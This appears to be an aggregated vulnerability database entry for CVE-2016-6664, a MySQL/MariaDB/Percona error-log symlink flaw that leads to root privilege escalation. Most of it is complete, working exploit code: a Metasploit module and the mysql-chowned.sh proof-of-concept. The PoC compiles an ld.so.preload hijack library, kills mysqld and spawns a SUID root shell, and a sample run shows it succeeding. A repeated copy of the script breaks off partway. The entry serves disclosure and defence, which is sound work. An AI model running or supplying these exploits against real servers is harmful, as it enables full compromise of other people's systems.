ID CVE-2016-6664 Type cve Reporter cve@mitre.org Modified 2020-11-09T03:20:00
Description
mysqld_safe in Oracle MySQL through 5.5.51, 5.6.x through 5.6.32, and 5.7.x through 5.7.14; MariaDB; Percona Server before 5.5.51-38.2, 5.6.x before 5.6.32-78-1, and 5.7.x before 5.7.14-8; and Percona XtraDB Cluster before 5.5.41-37.0, 5.6.x before 5.6.32-25.17, and 5.7.x before 5.7.14-26.17, when using file-based logging, allows local users with access to the mysql account to gain root privileges via a symlink attack on error logs and possibly other files.
{"metasploit": [{"lastseen": "2017-01-23T01:01:31", "description": "[About](<https://www.rapid7.com/about> \"About Rapid7\" ) [For Customers](<https://www.rapid7.com/for-customers> \"For Rapid7 Customers\" ) [Free Tools](<https://www.rapid7.com/free-tools> \"Free Tools from Rapid7\" )\n\n[  ](<https://www.rapid7.com> \"Rapid7\" )\n\n * [Home](<https://www.rapid7.com/> \"Rapid7.com\" )\n * Vulnerability & Exploit Database \n\n# Vulnerability & Exploit Database", "published": "2016-11-25T19:03:23", "type": "metasploit", "title": "CVE-2016-6664 MySQL / MariaDB / Percona - Root Privilege Escalation ", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6664"], "modified": "1970-01-01T00:00:00", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/mysql_priv_esc", "id": "MSF:EXPLOIT/LINUX/LOCAL/MYSQL_PRIV_ESC", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire \"msf/core\"\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::Common\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MySQL / MariaDB / Percona - Root Privilege Escalation',\n 'Description' => %q{\n MySQL-based databases including MySQL, MariaDB and Percona are affected\n by a privilege escalation vulnerability which can let attackers who have\n gained access to mysql system user to further escalate their privileges\n to root user allowing them to fully compromise the system.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'x2020 <x2020@gmail.com>', # Module\n 'Dawid Golunski' # Discovery\n ],\n 'DisclosureDate' => 'Nov 01 2016',\n 'Platform' => [ 'linux'],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [ ['Automatic', {}] ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' =>\n {\n 'DisablePayloadHandler' => true\n },\n 'References' =>\n [\n [ 'EDB', '40679'],\n [ 'CVE', '2016-6664'],\n [ 'URL', 'https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html']\n ]\n ))\n register_options(\n [\n OptString.new('ErrorLog', [ true, 'The error log file', '/var/log/mysql/error.log' ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),\n OptString.new('BackdoorShell', [ true, 'The shell path', '/bin/bash' ]),\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])\n ], self.class)\n end\n\n def check\n\n def check_reqs?()\n # should have mysqld_safe running\n check_command = \"if pgrep mysqld; \"\n check_command << \"then echo OK; \"\n check_command << \"fi\"\n output = cmd_exec(check_command).gsub(\"\\r\", '')\n vprint_status output\n if output['OK'] == 'OK'\n vprint_good \"mysqld_safe is running\"\n return true\n end\n print_error \"mysqld process not running\"\n false\n end\n\n def mysql_user?()\n # test for mysql user\n mysql = cmd_exec(\"id | grep -E '(mysql)'\")\n if not mysql.include?(\"mysql\")\n print_error \"The current session user (#{mysql}) is not mysql\"\n return false\n end\n vprint_good \"The current user is mysql\"\n true\n end\n\n def preload_exists?()\n if exists?(\"/etc/ld.so.preload\")\n print_error \"Found ld.so.preload. Exiting for safety.\"\n return true\n end\n false\n end\n\n def sudo_exists?()\n @sudo = cmd_exec('which sudo')\n if @sudo.include?(\"sudo\")\n return true\n end\n false\n end\n\n if check_reqs? and mysql_user? and sudo_exists?\n if preload_exists?\n return CheckCode::Detected\n end\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n\n if check != CheckCode::Appears\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')\n end\n\n # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.\n def has_prereqs?()\n vprint_status('Checking if gcc is installed')\n if target.name == \"Ubuntu\"\n gcc = cmd_exec('which gcc')\n if gcc.include?('gcc')\n vprint_good('gcc is installed')\n else\n print_error('gcc is not installed. Compiling will fail.')\n end\n return gcc.include?('gcc')\n else\n return false\n end\n end\n\n compile = has_prereqs?\n if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'\n if has_prereqs?()\n compile = true\n vprint_status('Live compiling exploit on system')\n else\n vprint_status('Dropping pre-compiled exploit on system')\n end\n end\n\n # build file names and locations\n privesclib_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) + \".so\"\n privescsrc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) + \".c\"\n pwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n payload_path = datastore[\"WritableDir\"] + \"/\" + rand_text_alpha(8)\n backdoorsh = datastore[\"BackdoorShell\"]\n backdoorpath = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n error_log_file = datastore[\"ErrorLog\"]\n\n # setup the files\n rm_f pwn_file\n if compile\n vprint_status \"Writing pwn source to #{privescsrc_file}\"\n rm_f privescsrc_file\n write_file(privescsrc_file, privesclib_file)\n cmd_exec(\"gcc -Wall -fPIC -shared -o #{privesclib_file} #{privescsrc_file} -ldl\")\n register_file_for_cleanup(privescsrc_file)\n else\n # privesclib.so file\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-6664', '2016-6664.out')\n fd = ::File.open( path, \"rb\")\n privesclib = fd.read(fd.stat.size)\n fd.close\n vprint_status \"Writing privesclib to #{privesclib_file}\"\n backdoorpath = \"/tmp/mysqlrootsh\" # hardcoded into privesclib.so\n write_file(privesclib_file, privesclib)\n end\n register_file_for_cleanup(backdoorpath)\n register_file_for_cleanup(privesclib_file)\n\n # the actual pwning\n def do_pwn(privesclib_file, suidbin, backdoorpath, payload_path)\n print_status \"Executing escalation.\"\n do_cmd_exec(\"echo #{privesclib_file} > /etc/ld.so.preload\")\n do_cmd_exec(\"chmod 755 /etc/ld.so.preload\")\n do_cmd_exec(\"#{suidbin} 2>/dev/null >/dev/null\")\n do_cmd_exec(\"#{backdoorpath} -p -c \\\"rm -f /etc/ld.so.preload; rm -f #{privesclib_file}\\\"\")\n do_cmd_exec(\"#{backdoorpath} -p\")\n end\n\n # reset system state\n def do_cleanup(error_log_file)\n cmd_exec(\"rm -f #{error_log_file}\")\n cmd_exec(\"mv -f #{error_log_file}.tmp #{error_log_file}\")\n cmd_exec(\"if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload; fi\")\n vprint_status \"Cleanup done.\"\n end\n\n # util cmd_exec with verbose print\n def do_cmd_exec(cmd)\n vprint_status cmd\n r = cmd_exec(cmd)\n if r != \"\"\n print_status r\n end\n end\n\n # initial setup for pwning\n vprint_status \"Seting up the preload trap\"\n do_cmd_exec(\"cp #{backdoorsh} #{backdoorpath}\")\n do_cmd_exec(\"touch -f #{error_log_file}; mv #{error_log_file} #{error_log_file}.tmp && ln -s /etc/ld.so.preload #{error_log_file}\")\n do_cmd_exec(\"kill $(pgrep mysqld)\")\n\n # wait for restart\n print_status \"Waiting for mysqld to restart...\"\n cmd_exec(\"while :; do { sleep 0.1; if [ -f /etc/ld.so.preload ]; then { echo #{privesclib_file} > /etc/ld.so.preload; rm -f #{error_log_file}; break; } fi } done\", nil, 125)\n\n # pwn the system\n do_pwn(privesclib_file, @sudo, backdoorpath, payload_path)\n\n # cleanup the mess\n do_cleanup(error_log_file)\n\n end\nend\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/mysql_priv_esc.rb"}], "seebug": [{"lastseen": "2017-11-19T12:02:51", "description": "I. VULNERABILITY\r\n-------------------------\r\n\r\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation\r\n\r\nMySQL \r\n\t<= 5.5.51\r\n\t<= 5.6.32\r\n\t<= 5.7.14\r\n\r\nMariaDB\r\n\tAll current\r\n\r\nPercona Server\r\n\t< 5.5.51-38.2\r\n\t< 5.6.32-78-1\r\n\t< 5.7.14-8\r\n\r\nPercona XtraDB Cluster\r\n\t< 5.6.32-25.17\r\n\t< 5.7.14-26.17\r\n\t< 5.5.41-37.0\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\nMySQL:\r\n\r\n\"MySQL is the world's most popular open source database.\r\nWhether you are a fast growing web property, technology ISV or large\r\nenterprise, MySQL can cost-effectively help you deliver high performance,\r\nscalable database applications.\"\r\n\r\n\"Many of the world's largest and fastest-growing organizations including\r\nFacebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time\r\nand money powering their high-volume Web sites, business-critical systems and\r\npackaged software.\"\r\n\r\nhttp://www.mysql.com/products/\r\nhttp://www.mysql.com/why-mysql/\r\n\r\n--\r\n\r\nMariaDB:\r\n\r\n\"MariaDB is one of the most popular database servers in the world. \r\nIts made by the original developers of MySQL and guaranteed to stay open source. \r\nNotable users include Wikipedia, WordPress.com and Google.\r\n\r\nMariaDB turns data into structured information in a wide array of applications, \r\nranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. \r\nMariaDB is used because it is fast, scalable and robust, with a rich ecosystem of \r\nstorage engines, plugins and many other tools make it very versatile for a wide \r\nvariety of use cases.\"\r\n\r\nhttps://mariadb.org/about/\r\n\r\n--\r\n\r\nPerconaDB:\r\n\r\n\"Percona Server for MySQL is a free, fully compatible, enhanced, open source \r\ndrop-in replacement for MySQL that provides superior performance, scalability \r\nand instrumentation. \r\nWith over 3,000,000 downloads, Percona Server\u8292\u9227\ue0fd\u5289s self-tuning algorithms and support\r\nfor extremely high-performance hardware delivers excellent performance and reliability.\"\r\n\r\nhttps://www.percona.com/software/mysql-database/percona-server\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nMySQL-based databases including MySQL, MariaDB and PerconaDB are affected\r\nby a privilege escalation vulnerability which can let attackers who have\r\ngained access to mysql system user to further escalate their privileges\r\nto root user allowing them to fully compromise the system.\r\nThe vulnerability stems from unsafe file handling of error logs and\r\nother files.\r\n\r\n\r\nIV. DESCRIPTION\r\n-------------------------\r\n\r\nThe error.log file on most default installations of MySQL/PerconaDB/MariaDB\r\ndatabases is stored either in /var/log/mysql or /var/lib/mysql directory.\r\n\r\nThe permissions on the file and directory look as follows:\r\n```\r\nroot@trusty:/var/lib/mysql# ls -la /var/log/mysql\r\ntotal 468\r\ndrwxr-s--- 2 mysql adm 4096 Sep 11 06:25 .\r\ndrwxrwxr-x 36 root syslog 4096 Sep 11 06:25 ..\r\n-rw-r----- 1 mysql adm 0 Sep 11 06:25 error.log\r\n\r\nroot@trusty:/var/lib/mysql# ls -lad /var/log/mysql\r\ndrwxr-s--- 2 mysql adm 4096 Sep 11 06:25 /var/log/mysql\r\n```\r\n\r\nmysqld_safe wrapper that is normally used for starting MySQL daemon and \r\ncreating/reopening the error.log performs certain unsafe file operations that\r\nmay allow attackers to gain root privileges.\r\n\r\nThe wrapper script contains a 'while' loop shown below which monitors the mysqld \r\nprocess and performs a restart in case of the process failure. \r\nThe restart involves re-creation of the error.log file if syslog logging has\r\nnot been configured instead of error log files (file-based logging is the \r\ndefault setting on most installations).\r\n\r\n\r\n--------[ mysqld_safe ]--------\r\n```\r\n[...]\r\n\r\nwhile true\r\ndo\r\n rm -f \"$pid_file\" # Some extra safety\r\n\r\n start_time=`date +%M%S`\r\n\r\n eval_log_error \"$cmd\"\r\n\r\n if [ $want_syslog -eq 0 -a ! -f \"$err_log\" ]; then\r\n touch \"$err_log\" # hypothetical: log was renamed but not\r\n chown $user \"$err_log\" # flushed yet. we'd recreate it with\r\n chmod \"$fmode\" \"$err_log\" # wrong owner next time we log, so set\r\n fi # it up correctly while we can!\r\n\r\n[...]\r\n```\r\n-------------------------------\r\n\r\nAs can be seen, the error.log file is created (touch) and chowned to the user\r\nrunning the mysqld daemon (typically 'mysql'). \r\n\r\nThe operation is vulnerable to a symlink attack.\r\n\r\nAttackers who obtained access to mysql account, through CVE-2016-6663\r\nvulnerability described at:\r\n\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n\r\nwould gain access to /var/log or /var/lib/mysql directories (owned by mysql user) \r\nand could therefore easily remove the error.log file and replace it \r\nwith a symlink to an arbitrary system file and escalate privileges.\r\n\r\nThe privilege escalation could be triggered instantly (without the need to wait\r\nfor mysql service restart/reboot) by attackers having 'mysql' account by simply \r\nkilling the mysqld child process (launched by the mysqld_safe wrapper).\r\n\r\nWhen the mysqld process gets terminated, the wrapper will then re-itertate the \r\nloop shown above and immediately create a mysql-owned file in the location \r\nspecified by the attacker in the symlink thus allowing attackers to quickly\r\nescalate their privileges.\r\n\r\n\r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n\r\n-------[ mysql-chowned.sh ]------\r\n```\r\n#!/bin/bash -p\r\n#\r\n# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit\r\n# mysql-chowned.sh (ver. 1.0)\r\n#\r\n# CVE-2016-6664 / OCVE-2016-5617\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# dawid[at]legalhackers.com\r\n#\r\n# https://legalhackers.com\r\n#\r\n# Follow https://twitter.com/dawid_golunski for updates on this advisory.\r\n#\r\n# This PoC exploit allows attackers to (instantly) escalate their privileges\r\n# from mysql system account to root through unsafe error log handling.\r\n# The exploit requires that file-based logging has been configured (default).\r\n# To confirm that syslog logging has not been enabled instead use:\r\n# grep -r syslog /etc/mysql\r\n# which should return no results.\r\n#\r\n# This exploit can be chained with the following vulnerability:\r\n# CVE-2016-6663 / OCVE-2016-5616\r\n# which allows attackers to gain access to mysql system account (mysql shell).\r\n#\r\n# In case database server has been configured with syslog you may also use:\r\n# CVE-2016-6662 as an alternative to this exploit.\r\n#\r\n# Usage:\r\n# ./mysql-chowned.sh path_to_error.log \r\n#\r\n#\r\n# See the full advisory for details at:\r\n# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n#\r\n# Video PoC:\r\n# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. Do no harm.\r\n#\r\n\r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/mysqlrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n\r\nfunction cleanexit {\r\n\t# Cleanup \r\n\techo -e \"\\n[+] Cleaning up...\"\r\n\trm -f $PRIVESCSRC\r\n\trm -f $PRIVESCLIB\r\n\trm -f $ERRORLOG\r\n\ttouch $ERRORLOG\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo -n > /etc/ld.so.preload\r\n\tfi\r\n\techo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\n\texit $1\r\n}\r\n\r\nfunction ctrl_c() {\r\n echo -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"\r\n\tcleanexit 0\r\n}\r\n\r\n#intro \r\necho -e \"\\033[94m \\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \\nmysql-chowned.sh (ver. 1.0)\\n\\nCVE-2016-6664 / OCVE-2016-5617\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n\r\n# Args\r\nif [ $# -lt 1 ]; then\r\n\techo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_error.log \\n\"\r\n\techo -e \"It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Priv check\r\n\r\necho -e \"\\n[+] Starting the exploit as \\n\\033[94m`id`\\033[0m\"\r\nid | grep -q mysql \r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] You need to execute the exploit as mysql user! Exiting.\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Set target paths\r\nERRORLOG=\"$1\"\r\nif [ ! -f $ERRORLOG ]; then\r\n\techo -e \"\\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\\n\"\r\n\texit 3\r\nfi\r\necho -e \"\\n[+] Target MySQL log file set to $ERRORLOG\"\r\n\r\n# [ Active exploitation ]\r\n\r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\n #include <sys/types.h>\r\n #include <sys/stat.h>\r\n #include <fcntl.h>\r\n\r\nuid_t geteuid(void) {\r\n\tstatic uid_t (*old_geteuid)();\r\n\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\n\tif ( old_geteuid() == 0 ) {\r\n\t\tchown(\"$BACKDOORPATH\", 0, 0);\r\n\t\tchmod(\"$BACKDOORPATH\", 04777);\r\n\t\t//unlink(\"/etc/ld.so.preload\");\r\n\t}\r\n\treturn old_geteuid();\r\n}\r\n_solibeof_\r\n/bin/bash -c \"gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\"\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\n\tcleanexit 2;\r\nfi\r\n\r\n\r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n\r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\n\techo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\n\texit 2\r\nfi\r\n\r\n# Symlink the log file to /etc\r\nrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Couldn't remove the $ERRORLOG file or create a symlink.\"\r\n\tcleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $ERRORLOG`\"\r\n\r\n# Wait for MySQL to re-open the logs\r\necho -ne \"\\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\\n\"\r\nread -p \"Do you want to kill mysqld process to instantly get root? :) ? [y/n] \" THE_ANSWER\r\nif [ \"$THE_ANSWER\" = \"y\" ]; then\r\n\techo -e \"Got it. Executing 'killall mysqld' now...\"\r\n\tkillall mysqld\r\nfi\r\nwhile :; do \r\n\tsleep 0.1\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo $PRIVESCLIB > /etc/ld.so.preload\r\n\t\trm -f $ERRORLOG\r\n\t\tbreak;\r\n\tfi\r\ndone\r\n\r\n# /etc/\tdir should be owned by mysql user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\nchmod 755 /etc/ld.so.preload\r\n\r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo 2>/dev/null >/dev/null\r\n\r\n#while :; do \r\n#\tsleep 0.1\r\n#\tps aux | grep mysqld | grep -q 'log-error'\r\n#\tif [ $? -eq 0 ]; then\r\n#\t\tbreak;\r\n#\tfi\r\n#done\r\n\r\n# Check for the rootshell\r\nls -l $BACKDOORPATH\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then \r\n\techo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\n\techo -e \"\\n\\033[94mGot root! The database server has been ch-OWNED !\\033[0m\"\r\nelse\r\n\techo -e \"\\n[!] Failed to get root\"\r\n\tcleanexit 2\r\nfi\r\n\r\n\r\n# Execute the rootshell\r\necho -e \"\\n[+] Spawning the rootshell $BACKDOORPATH now! \\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n\r\n# Job done.\r\ncleanexit 0\r\n\r\n```\r\n\r\n------------EOF------------------\r\n\r\n\r\nExample run\r\n~~~~~~~~~~~~~~~~\r\n```\r\nmysql_suid_shell.MYD-4.3$ whoami\r\nmysql\r\n\r\nomysql_suid_shell.MYD-4.3$ dpkg -l | grep percona-server-server\r\niU percona-server-server 5.6.32-78.0-1.xenial amd64 Percona Server database server\r\niF percona-server-server-5.6 5.6.32-78.0-1.xenial amd64 Percona Server database server binaries\r\n\r\nmysql_suid_shell.MYD-4.3$ ./mysql-chowned.sh /var/lib/mysql/xenial-percona.err \r\n \r\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \r\nmysql-chowned.sh (ver. 1.0)\r\n\r\nCVE-2016-6664 / OCVE-2016-5617\r\n\r\nDiscovered and coded by: \r\n\r\nDawid Golunski \r\nhttp://legalhackers.com \r\n\r\n[+] Starting the exploit as \r\nuid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)\r\n\r\n[+] Target MySQL log file set to /var/lib/mysql/xenial-percona.err\r\n\r\n[+] Compiling the privesc shared library (/tmp/privesclib.c)\r\n\r\n[+] Backdoor/low-priv shell installed at: \r\n-rwxr-xr-x 1 mysql attacker 1037528 Nov 1 05:08 /tmp/mysqlrootsh\r\n\r\n[+] Symlink created at: \r\nlrwxrwxrwx 1 mysql attacker 18 Nov 1 05:08 /var/lib/mysql/xenial-percona.err -> /etc/ld.so.preload\r\n\r\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\r\nDo you want to kill mysqld process to instantly get root? :) ? [y/n] y\r\nGot it. Executing 'killall mysqld' now...\r\n\r\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \r\n-rw-r----- 1 mysql root 19 Nov 1 05:08 /etc/ld.so.preload\r\n\r\n[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload\r\n\r\n[+] The /etc/ld.so.preload file now contains: \r\n/tmp/privesclib.so\r\n\r\n[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!\r\n-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh\r\n\r\n[+] Rootshell got assigned root SUID perms at: \r\n-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh\r\n\r\nGot root! The database server has been ch-OWNED !\r\n\r\n[+] Spawning the rootshell /tmp/mysqlrootsh now! \r\n\r\nmysqlrootsh-4.3# whoami\r\nroot\r\n\r\nmysqlrootsh-4.3# exit\r\nexit\r\n\r\n[+] Cleaning up...\r\n\r\n[+] Job done. Exiting with code 0\r\n\r\n```\r\n\r\nVideo PoC:\r\n~~~~~~~~~~~~~\r\n\r\nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nAlthough the severity of this issue is lower on its own (attackers need to\r\ngain access to mysql system user), the vulnerability could easily be combined \r\nwith the CVE-2016-6663 issue.\r\nThe combination of the two would effectively allow low privileged local \r\ndatabase users to escalate their system privileges to root system account and \r\nallow them to fully compromise the server which increases the severity of this\r\nissue.\r\n\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nMySQL \r\n\t<= 5.5.51\r\n\t<= 5.6.32\r\n\t<= 5.7.14\r\n\r\nMariaDB\r\n\tAll current\r\n\r\nPercona Server\r\n\t< 5.5.51-38.2\r\n\t< 5.6.32-78-1\r\n\t< 5.7.14-8\r\n\r\nPercona XtraDB Cluster\r\n\t< 5.6.32-25.17\r\n\t< 5.7.14-26.17\r\n\t< 5.5.41-37.0\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nVendors have released patches after private disclosure.\r\nUpdate to the latest version of your DBMS.\r\n\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com\r\n\r\nThis advisory:\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n\r\nExploit source code:\r\nhttp://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh\r\n\r\nRelated mysql vulnerabilities discovered by the author of thid advisory that can be chained with \r\nthe CVE-2016-6664 vulnerability:\r\n\r\nCVE-2016-6663:\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html\r\nCVE-2016-6662:\r\nhttp://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html\r\n\r\n\r\nVideo PoC:\r\nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n\r\nCVE-2016-6664\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664\r\n\r\nOracle CPU:\r\nhttp://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL\r\n\r\n\r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\n\r\nhttp://legalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\n01.11.2016 - Advisory released\r\n \r\n\r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.", "published": "2016-11-02T00:00:00", "type": "seebug", "title": "MySQL / MariaDB / PerconaDB elevation of privilege vulnerability, CVE-2016-6664\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5616", "CVE-2016-5617", "CVE-2016-6662", "CVE-2016-6663", "CVE-2016-6664"], "modified": "2016-11-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92513", "id": "SSV:92513", "sourceData": "\n #!/bin/bash -p\r\n#\r\n# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit\r\n# mysql-chowned.sh (ver. 1.0)\r\n#\r\n# CVE-2016-6664 / OCVE-2016-5617\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# dawid[at]legalhackers.com\r\n#\r\n# https://legalhackers.com\r\n#\r\n# Follow https://twitter.com/dawid_golunski for updates on this advisory.\r\n#\r\n# This PoC exploit allows attackers to (instantly) escalate their privileges\r\n# from mysql system account to root through unsafe error log handling.\r\n# The exploit requires that file-based logging has been configured (default).\r\n# To confirm that syslog logging has not been enabled instead use:\r\n# grep -r syslog /etc/mysql\r\n# which should return no results.\r\n#\r\n# This exploit can be chained with the following vulnerability:\r\n# CVE-2016-6663 / OCVE-2016-5616\r\n# which allows attackers to gain access to mysql system account (mysql shell).\r\n#\r\n# In case database server has been configured with syslog you may also use:\r\n# CVE-2016-6662 as an alternative to this exploit.\r\n#\r\n# Usage:\r\n# ./mysql-chowned.sh path_to_error.log \r\n#\r\n#\r\n# See the full advisory for details at:\r\n# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n#\r\n# Video PoC:\r\n# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. Do no harm.\r\n#\r\n\r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/mysqlrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n\r\nfunction cleanexit {\r\n\t# Cleanup \r\n\techo -e \"\\n[+] Cleaning up...\"\r\n\trm -f $PRIVESCSRC\r\n\trm -f $PRIVESCLIB\r\n\trm -f $ERRORLOG\r\n\ttouch $ERRORLOG\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo -n > /etc/ld.so.preload\r\n\tfi\r\n\techo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\n\texit $1\r\n}\r\n\r\nfunction ctrl_c() {\r\n echo -e \"\\n[+] Active exploitation aborted. 